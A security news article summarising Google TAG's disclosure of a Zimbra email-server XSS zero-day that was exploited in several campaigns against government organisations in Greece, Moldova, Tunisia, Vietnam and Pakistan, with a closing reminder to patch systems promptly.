Months after ensuring that the patch actually works, Google has now disclosed more details about active exploitation of a Zimbra zero-day vulnerability. The tech giant explained how the threat actors exploited the Zimbra zero-day in various malicious campaigns before and after the patch release.
Zimbra Zero-Day Flaw Exploited To Target Govt. Orgs – Says Google
In a recent post, Google elaborated on different malicious campaigns exploiting the Zimbra zero-day vulnerability patched earlier this year.
Specifically, in July, Zimbra addressed a severe zero-day flaw in Zimbra Collaboration Suite (ZCS) email servers, allowing XSS attacks. At that time, Zimbra didn’t share any details about actively exploiting the flaw. However, Google researchers disclosed detecting active exploitation attempts of the vulnerability. Yet, there weren’t many details about the attacks.
However, Google has now shared insights about the repeated exploitation of vulnerability to target different government organizations. As explained in their post, Google’s Threat Analysis Group (TAG) discovered this XSS vulnerability a month before the patch release. They observed three threat groups exploiting the flaw before the stable patch release.
Following the first exploitation against government organizations in Greece, Zimbra deployed a hotfix on GitHub. Nonetheless, it appeared that this hotfix brought the zero-day to the attention of other threat actor groups. Consequently, Google detected two more malicious campaigns exploiting this flaw to target users in Moldova and Tunisia. Google TAG attributed these campaigns to the Winter Vivern (UNC4907) APT Group.
Then, a third malicious campaign also caught Google’s attention as another, unidentified threat actor group exploited the zero-day to target a Vietnamese government firm. This phishing campaign aimed to steal webmail credentials.
While Zimbra released a working patch for the zero-day following the Vietnam campaign, the criminal hackers seemingly continued hunting for vulnerable systems. Consequently, a fourth malicious campaign to steal Zimbra authentication tokens surfaced online, targeting a Pakistani government organization.
Users Must Always Keep Their Systems Up-to-date
Besides disclosing the countries, Google hasn’t shared precise details about the victims and the outcome of these attacks. Yet, with the latest disclosure, Google emphasized on the importance of swift system updates to receive the latest security fixes.
Moreover, Google also highlighted how the threat actors keep monitoring open-source repositories to know about the latest vulnerability fixes so as to hunt for vulnerable systems.
Let us know your thoughts in the comments.